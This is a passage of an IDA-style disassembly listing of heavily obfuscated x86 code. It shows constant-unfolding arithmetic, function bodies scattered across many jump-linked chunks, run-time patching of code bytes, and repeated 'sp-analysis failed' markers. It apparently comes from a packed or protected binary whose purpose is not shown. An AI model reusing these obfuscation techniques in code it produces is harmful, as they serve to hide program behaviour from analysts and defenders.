; START OF FUNCTION CHUNK FOR sub_447EB5
loc_43A917: ; CODE XREF: sub_447EB5+6j
jz loc_455B19
jmp loc_44A1B9
; END OF FUNCTION CHUNK FOR sub_447EB5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_43A922: ; CODE XREF: sub_447CBE-4F9Fj
jz loc_43C2F4
not edi
jmp loc_44D4B2
; END OF FUNCTION CHUNK FOR sub_447CBE
; =============== S U B R O U T I N E =======================================
sub_43A92F proc near ; CODE XREF: ut7h7i2x:004398FCj
; sub_44DB48+5C6Ap
; FUNCTION CHUNK AT 0043C01D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043CDF6 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00448067 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044AA18 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004554B3 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
add edx, ebp
add edx, 5B8B2E08h
mov [edx], eax
jmp loc_448067
sub_43A92F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439701
loc_43A942: ; CODE XREF: sub_455775:loc_43E9FEj
; sub_439701+1C6BCj
push 87FABFEEh
pop eax
rol eax, 0Ch
sub eax, 0FF53FA0Ah
jmp loc_457533
; END OF FUNCTION CHUNK FOR sub_439701
; =============== S U B R O U T I N E =======================================
sub_43A956 proc near ; DATA XREF: sub_450058+1o
; FUNCTION CHUNK AT 0044A08E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044C87A SIZE 00000005 BYTES
push 0D40E6756h
pop edi
or edi, 0E879BFFAh
add edi, 0B6B5EAE8h
and edi, 9FC4C666h
jmp loc_44C87A
sub_43A956 endp
; ---------------------------------------------------------------------------
rol edi, 18h
jmp loc_44B7D1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_359. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F66D
loc_43A97C: ; CODE XREF: sub_43F66D+13E89j
pop edx
loc_43A97D: ; CODE XREF: sub_43F66D:loc_4534EDj
xor ecx, 92C292ECh
xor eax, ecx
xchg esi, [esp+0]
mov ecx, esi
pop esi
jmp loc_44A8E4
; END OF FUNCTION CHUNK FOR sub_43F66D
; =============== S U B R O U T I N E =======================================
sub_43A990 proc near ; DATA XREF: ut7h7i2x:00459FD9o
mov ds:off_41D084, eax
lea eax, loc_43AD92
mov byte ptr [eax], 0C3h
jmp loc_43AD92
sub_43A990 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447167
loc_43A9A4: ; CODE XREF: sub_447167-C3CFj
mov eax, [esp+0]
push ebx
mov ebx, edx
xchg ebx, [esp+4+var_4]
jmp loc_44B1F7
; END OF FUNCTION CHUNK FOR sub_447167
; ---------------------------------------------------------------------------
loc_43A9B2: ; DATA XREF: sub_43D989+3820o
xchg ebp, [esp]
mov esp, ebp
xchg edx, [esp]
mov ebp, edx
pop edx
mov eax, ds:dword_44880C
jmp loc_4473D3
; ---------------------------------------------------------------------------
loc_43A9C8: ; CODE XREF: ut7h7i2x:loc_45643Fj
mov [ebp-8], eax
push 417C78Fh
pop eax
sub eax, 881D712Fh
or eax, 0FEBA935Eh
test eax, 2
jmp loc_44F6AB
; ---------------------------------------------------------------------------
loc_43A9E8: ; CODE XREF: ut7h7i2x:004562A8j
and eax, 12B21BDDh
; =============== S U B R O U T I N E =======================================
sub_43A9EE proc near ; CODE XREF: sub_43AED9+BCD2p
; FUNCTION CHUNK AT 00439452 SIZE 00000018 BYTES
xchg ecx, [esp+0]
pop ecx
push esi
push 174169Eh
jmp loc_439452
sub_43A9EE endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445F20
loc_43A9FD: ; CODE XREF: sub_445F20+4ACFj
sub eax, 5EDBAC05h
loc_43AA03: ; CODE XREF: ut7h7i2x:0045772Ej
xor eax, 0E4A7E32h
add eax, 88ED7D9Fh
loc_43AA0F: ; CODE XREF: ut7h7i2x:loc_440C91j
xchg eax, [esp+0]
jmp loc_44242F
; END OF FUNCTION CHUNK FOR sub_445F20
; ---------------------------------------------------------------------------
push offset loc_444C7B
jmp locret_43CFB0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_43AA21: ; CODE XREF: sub_43AA94+200E4j
and ecx, 0A4964533h
rol ecx, 13h
test ecx, 80h
jmp loc_45AE2B
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E70F
loc_43AA35: ; CODE XREF: sub_44E70F:loc_444500j
xchg esi, [esp+0]
mov edx, esi
pop esi
lea eax, loc_44A9B6
mov byte ptr [eax], 0C3h
jmp loc_443308
; END OF FUNCTION CHUNK FOR sub_44E70F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45601B
loc_43AA49: ; CODE XREF: sub_45601B:loc_45A748j
push offset sub_4474D5
jmp nullsub_457
; END OF FUNCTION CHUNK FOR sub_45601B
; ---------------------------------------------------------------------------
and edi, 0EAAB2B25h
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_43AA59: ; CODE XREF: sub_43DBEC:loc_4406B8j
jmp sub_44E361
; END OF FUNCTION CHUNK FOR sub_43DBEC
; =============== S U B R O U T I N E =======================================
sub_43AA5E proc near ; CODE XREF: ut7h7i2x:0044C726p
; ut7h7i2x:0044E3ACj
xchg edx, [esp+0]
pop edx
mov [esi], eax
pop esi
retn
sub_43AA5E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_43AA66: ; CODE XREF: ut7h7i2x:004493F1j
jo loc_44C339
loc_43AA6C: ; CODE XREF: ut7h7i2x:loc_447E60j
cmp dword ptr [ebp-108h], 31342D37h
jnz loc_43F01A
jmp loc_451BFC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_289. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_43AA82: ; CODE XREF: ut7h7i2x:0043BD87j
jmp nullsub_229
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E6CC
loc_43AA87: ; CODE XREF: sub_43E6CC:loc_4590EAj
mov ebp, edi
xchg eax, [esp+0]
mov edi, eax
pop eax
jmp loc_454456
; END OF FUNCTION CHUNK FOR sub_43E6CC
; =============== S U B R O U T I N E =======================================
sub_43AA94 proc near ; CODE XREF: ut7h7i2x:loc_43924Dp
; sub_43E6CC-517Dj ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0043AA21 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043AB3F SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0043B1A1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B56D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043BD59 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043C934 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EDFB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EEC7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EF9D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F432 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004427DE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443C9B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044419E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004442FE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004448A9 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044572A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445988 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00445BD4 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00446616 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446B5D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446CD9 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00447248 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00447C6C SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00447F4D SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00448400 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449D1A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AB6F SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044AD1A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B5FF SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044B9C3 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044BDC4 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044C33F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C56F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044D0A4 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044DA1B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DB32 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044F753 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00454F54 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00455D8B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004582FB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458521 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00459065 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045AB69 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045AE2B SIZE 00000006 BYTES
jnz loc_443C9B
jmp loc_446616
sub_43AA94 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E688
loc_43AA9F: ; CODE XREF: sub_44E688:loc_4553FFj
mov edx, esi
pop esi
and edx, 0D119BA4Fh
sub edx, 7F7AFB6Dh
test edx, 80000000h
jmp loc_450BDF
; END OF FUNCTION CHUNK FOR sub_44E688
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_297. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4570FD
loc_43AABA: ; CODE XREF: sub_4570FD-3065j
jmp nullsub_530
; END OF FUNCTION CHUNK FOR sub_4570FD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455145
loc_43AABF: ; CODE XREF: sub_455145-1B434j
jmp loc_44CBE5
; END OF FUNCTION CHUNK FOR sub_455145
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B5D4
loc_43AAC4: ; CODE XREF: sub_43B5D4-1E07j
jmp loc_44A210
; END OF FUNCTION CHUNK FOR sub_43B5D4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_43AAC9: ; CODE XREF: sub_450FDE+7F61j
and eax, ds:4000F0h
rol eax, 1Bh
or eax, 9606F6DFh
add eax, 0F55787B4h
add eax, ebp
add eax, 54318065h
mov eax, [eax]
mov byte ptr [ebp+eax-100h], 0
jmp loc_455D1A
; END OF FUNCTION CHUNK FOR sub_450FDE
; =============== S U B R O U T I N E =======================================
sub_43AAF5 proc near ; DATA XREF: ut7h7i2x:004430C7o
; FUNCTION CHUNK AT 00447BBE SIZE 00000002 BYTES
push ebx
push 9C3C0686h
pop ebx
rol ebx, 1Ch
and ebx, 0A1ADCB68h
sub ebx, ds:4000F5h
or ebx, 210838E9h
add ebx, 4E83527Fh
jmp loc_447BBE
sub_43AAF5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4490E0
loc_43AB1C: ; CODE XREF: sub_4490E0:loc_4582EAj
push offset sub_43A27F
jmp nullsub_520
; END OF FUNCTION CHUNK FOR sub_4490E0
; ---------------------------------------------------------------------------
loc_43AB26: ; DATA XREF: sub_44124A:loc_458C8Bo
mov eax, [esp]
call sub_4594B7
; START OF FUNCTION CHUNK FOR sub_44124A
loc_43AB2E: ; CODE XREF: sub_43A218:loc_43C077j
; sub_44124A+Bj
xchg eax, [esp+0]
mov edx, eax
push edi
loc_43AB34: ; CODE XREF: ut7h7i2x:loc_448B84j
push 706B4D82h
pop edi
jmp loc_457DDC
; END OF FUNCTION CHUNK FOR sub_44124A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_43AB3F: ; CODE XREF: sub_43AA94:loc_448400j
push 55127ED0h
pop edi
or edi, 0C945AD33h
add edi, 0DB5AD237h
xor edi, 7E04C54Ch
xor eax, edi
pop edi
rol eax, 1Bh
jmp loc_44572A
; END OF FUNCTION CHUNK FOR sub_43AA94
; =============== S U B R O U T I N E =======================================
sub_43AB62 proc near ; CODE XREF: sub_446CA0-D571j
; sub_449E96-3D9Cp
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_10 = dword ptr 14h
; FUNCTION CHUNK AT 00439EC8 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043AD1F SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043AFB3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CD5F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043CF35 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043DB15 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043E93A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043EBB2 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00441A54 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441FD5 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00442797 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044340A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004436A7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443759 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004440B9 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00445B27 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044690F SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00446918 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004476A0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449126 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004496A2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044A18E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AB5E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B8ED SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044C0B7 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044C4E5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C649 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044D3CB SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044D772 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DBE0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DF93 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E083 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044EF1D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044EF96 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044F28D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00450007 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004500CB SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00450227 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004507C1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004518E6 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00452538 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045433B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454510 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00454BDB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455302 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00455FDD SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0045685D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458300 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045911B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004592FE SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00459ACA SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0045AC8D SIZE 00000019 BYTES
xchg esi, [esp+0]
pop esi
cmp al, 0A4h
jz loc_4592FE
jmp loc_4436A7
sub_43AB62 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445EDA
loc_43AB73: ; CODE XREF: sub_445EDA:loc_445EE5j
mov eax, edx
call sub_45499E
mov eax, [esp+0]
call sub_454196
retn
; END OF FUNCTION CHUNK FOR sub_445EDA
; ---------------------------------------------------------------------------
loc_43AB83: ; CODE XREF: ut7h7i2x:00447A45j
jmp loc_43D286
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459C87
loc_43AB88: ; CODE XREF: sub_459C87-173F7j
jmp nullsub_10
; END OF FUNCTION CHUNK FOR sub_459C87
; ---------------------------------------------------------------------------
db 81h ;
db 0F0h ; ð
db 2Dh ; -
db 5Fh ; _
db 2Fh ; /
db 78h ; x
db 0E9h ; é
db 0FEh ; þ
db 3Ch ; <
db 1
db 0
; ---------------------------------------------------------------------------
loc_43AB98: ; DATA XREF: sub_44C99C:loc_448B0Ao
jmp loc_4547E3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C99C
loc_43AB9D: ; CODE XREF: ut7h7i2x:00450917j
; sub_44C99C+5148j
pop ecx
xchg ebx, [esp-4+arg_0]
mov ebp, ebx
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_44C99C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457818
loc_43ABA5: ; CODE XREF: sub_457818:loc_44FB38j
shr ecx, 18h
add ecx, ebp
jmp loc_43FAB4
; END OF FUNCTION CHUNK FOR sub_457818
; ---------------------------------------------------------------------------
locret_43ABAF: ; CODE XREF: ut7h7i2x:loc_454246j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45967C
loc_43ABB0: ; CODE XREF: sub_45967C-E205j
jmp loc_4531C3
; END OF FUNCTION CHUNK FOR sub_45967C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B01F
loc_43ABB5: ; CODE XREF: sub_44B01F-6480j
jmp sub_44B01F
; END OF FUNCTION CHUNK FOR sub_44B01F
; =============== S U B R O U T I N E =======================================
sub_43ABBA proc near ; CODE XREF: sub_44917B-FBB2p
; sub_44941C-C7AEj ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004393E4 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044B0A0 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0045660F SIZE 00000024 BYTES
xchg edi, [esp+4+var_4]
pop edi
add esi, 7FFDBD6Fh
and ecx, esi
pop esi
mov eax, 1
jmp loc_4393E4
sub_43ABBA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43ABD1 proc near ; DATA XREF: sub_45499Eo
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00457D57 SIZE 0000000A BYTES
push ebp
mov ebp, esp
push eax
mov eax, ecx
xchg eax, [esp+4+var_4]
mov [ebp+var_4], eax
jmp loc_457D57
sub_43ABD1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447F8A
loc_43ABE2: ; CODE XREF: sub_447F8A+Cj
mov eax, [ebp+8]
test byte ptr [eax-8], 80h
jz loc_4517DA
push offset loc_448D03
jmp nullsub_156
; END OF FUNCTION CHUNK FOR sub_447F8A
; ---------------------------------------------------------------------------
loc_43ABF9: ; CODE XREF: ut7h7i2x:00447AEEj
popf
rol edx, 18h
loc_43ABFD: ; CODE XREF: ut7h7i2x:loc_447C61j
push offset loc_44FBE9
jmp locret_43A387
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_183. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_43AC08: ; CODE XREF: ut7h7i2x:004447F8j
jmp locret_45700D
; ---------------------------------------------------------------------------
byte_43AC0D db 9, 0C9h ; DATA XREF: sub_4519D2-8DD0o
; ---------------------------------------------------------------------------
push offset loc_43D9E6
jmp loc_44D07D
; ---------------------------------------------------------------------------
loc_43AC19: ; CODE XREF: ut7h7i2x:00451C37j
; ut7h7i2x:00451C4Dj
rol ebx, 1Fh
add ebx, 20AD30F3h
mov [ebx], eax
call sub_44ED99
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_43AC29: ; CODE XREF: sub_44EC11:loc_43EDBAj
jmp loc_447390
; END OF FUNCTION CHUNK FOR sub_44EC11
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_43AC2E: ; CODE XREF: sub_4503C3-56E7j
js loc_453F50
not ebp
add ebx, eax
rol edi, 1Fh
jmp loc_43BA1B
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
rol edi, 0Ch
jmp sub_453621
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_43AC48: ; CODE XREF: sub_43A556+A02Fj
jnz loc_44D78E
jmp loc_447FF6
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452D3D
loc_43AC53: ; CODE XREF: sub_452D3D:loc_443E44j
xor esi, 0ADE0AED6h
jns loc_450745
xor eax, 54C40775h
popf
jmp loc_4419E6
; END OF FUNCTION CHUNK FOR sub_452D3D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4448AF
loc_43AC6B: ; CODE XREF: sub_4448AF:loc_44DFE1j
jz loc_44FD0F
jmp loc_4464BF
; END OF FUNCTION CHUNK FOR sub_4448AF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_43AC76: ; CODE XREF: sub_439BF8:loc_444777j
or eax, 1E7D4E73h
add eax, 92FABE06h
sub eax, 0E8EA878Dh
xor eax, 2466A607h
add eax, ebp
push esi
push 3C244147h
loc_43AC96: ; CODE XREF: ut7h7i2x:0044E347j
pop esi
jmp loc_43CD03
; END OF FUNCTION CHUNK FOR sub_439BF8
; =============== S U B R O U T I N E =======================================
sub_43AC9C proc near ; DATA XREF: ut7h7i2x:loc_44511Ao
call sub_44B8F8
call sub_4390BF
sub_43AC9C endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4448D7
loc_43ACA6: ; CODE XREF: sub_4448D7+B6B0j
jmp loc_45890F
; END OF FUNCTION CHUNK FOR sub_4448D7
; ---------------------------------------------------------------------------
loc_43ACAB: ; CODE XREF: ut7h7i2x:0043DC45j
jmp loc_43F285
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_85. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A76A
loc_43ACB1: ; CODE XREF: sub_43A76A+Cj
jmp loc_452236
; END OF FUNCTION CHUNK FOR sub_43A76A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441A79
loc_43ACB6: ; CODE XREF: sub_441A79:loc_441A7Ej
mov ecx, eax
xchg ecx, [esp+0]
ror eax, 11h
push edi
push 0CC6907B4h
xchg ebp, [esp+8+var_8]
jmp loc_45AD98
; END OF FUNCTION CHUNK FOR sub_441A79
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F19A
loc_43ACCC: ; CODE XREF: sub_43F19A:loc_4497BCj
mov ecx, [ecx]
add eax, ecx
pop ecx
push edi
pushf
jmp loc_456F02
; END OF FUNCTION CHUNK FOR sub_43F19A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_503. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4502F0
loc_43ACD9: ; CODE XREF: sub_4502F0+5D81j
jmp loc_440CDE
; END OF FUNCTION CHUNK FOR sub_4502F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45108E
loc_43ACDE: ; CODE XREF: sub_45108E+7j
jmp loc_4567A5
; END OF FUNCTION CHUNK FOR sub_45108E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_193. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446ACE
loc_43ACE4: ; CODE XREF: sub_446ACE+Dj
jmp loc_43DAAA
; END OF FUNCTION CHUNK FOR sub_446ACE
; ---------------------------------------------------------------------------
loc_43ACE9: ; CODE XREF: ut7h7i2x:004440A6j
jmp loc_44DA82
; ---------------------------------------------------------------------------
loc_43ACEE: ; CODE XREF: ut7h7i2x:loc_43A197j
add eax, 90AAB1C5h
and eax, 7538C2FBh
push ecx
mov ecx, offset loc_445FF4
jmp loc_449265
; ---------------------------------------------------------------------------
loc_43AD05: ; DATA XREF: ut7h7i2x:004405DEo
call sub_44ED9F
push ebx
mov ebx, eax
xchg ebx, [esp]
ror eax, 8
push esi
push 4D012CF2h
pop esi
jmp loc_44468D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_43AD1F: ; CODE XREF: sub_43AB62+1B499j
add eax, 9A5DC02Eh
mov eax, [eax]
loc_43AD27: ; CODE XREF: ut7h7i2x:0043CCB1j
cmp byte ptr [eax], 0F1h
jnz loc_459303
jmp loc_454BDB
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_43AD35: ; CODE XREF: sub_4503C3:loc_44EBE8j
sbb ebx, 0E1DD251Dh
sbb ecx, 871C764h
jmp loc_451E65
; END OF FUNCTION CHUNK FOR sub_4503C3
; =============== S U B R O U T I N E =======================================
sub_43AD46 proc near ; CODE XREF: sub_43C9F5+12p
; ut7h7i2x:004599DEj
xchg esi, [esp+0]
pop esi
push 218224CBh
pop esi
add esi, 641100BDh
or esi, 0CF2AC68Ah
add esi, 3085E9C6h
jmp loc_43CF0B
sub_43AD46 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A08
loc_43AD67: ; CODE XREF: sub_444A08:loc_43C8BFj
push 44CD8217h
pop eax
add eax, 68A0C171h
sub eax, 6F73ED82h
rol eax, 7
add eax, 3189D22h
jmp loc_451967
; END OF FUNCTION CHUNK FOR sub_444A08
; ---------------------------------------------------------------------------
jmp ds:off_41D084
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44682E
loc_43AD8D: ; CODE XREF: sub_44682E+Aj
jmp loc_4575CD
; END OF FUNCTION CHUNK FOR sub_44682E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447167
loc_43AD92: ; CODE XREF: sub_43A990+Fj
; sub_447167-B84Ej ...
xchg edi, [esp+4+var_4]
mov edx, edi
pop edi
jz loc_43A9A4
jmp loc_4448F9
; END OF FUNCTION CHUNK FOR sub_447167
; ---------------------------------------------------------------------------
loc_43ADA3: ; CODE XREF: ut7h7i2x:00453A23j
mov ecx, eax
xchg ecx, [esp]
push 0E89B9C6h
pop eax
jmp loc_4466B6
; ---------------------------------------------------------------------------
or edx, 0D4213C63h
mov [edx], ecx
jmp sub_4494C0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_43ADC0: ; CODE XREF: sub_44EC11:loc_448EF4j
mov eax, [eax]
mov dword ptr [ebp+eax*4-70h], 73257325h
call sub_44EC11
; END OF FUNCTION CHUNK FOR sub_44EC11
; START OF FUNCTION CHUNK FOR sub_44E3FD
loc_43ADCF: ; CODE XREF: sub_44E3FD+13j
jmp loc_43BEAA
; END OF FUNCTION CHUNK FOR sub_44E3FD
; ---------------------------------------------------------------------------
loc_43ADD4: ; CODE XREF: ut7h7i2x:0044FEEDj
popf
jmp loc_458016
; ---------------------------------------------------------------------------
loc_43ADDA: ; CODE XREF: ut7h7i2x:004461B7j
popf
; =============== S U B R O U T I N E =======================================
sub_43ADDB proc near ; CODE XREF: ut7h7i2x:0043B6F5p
; FUNCTION CHUNK AT 00442230 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044627B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448BD3 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044B67C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044D6F2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E27B SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00452421 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452668 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00452C17 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456C70 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A315 SIZE 00000018 BYTES
xchg eax, [esp+0]
pop eax
push 0DC8C6DE5h
pop eax
sub eax, 0E613A380h
jmp loc_452421
sub_43ADDB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
shr ecx, 8
jmp sub_43C413
; ---------------------------------------------------------------------------
loc_43ADF8: ; CODE XREF: ut7h7i2x:loc_45A7C8j
jl loc_452016
loc_43ADFE: ; CODE XREF: ut7h7i2x:00452D76j
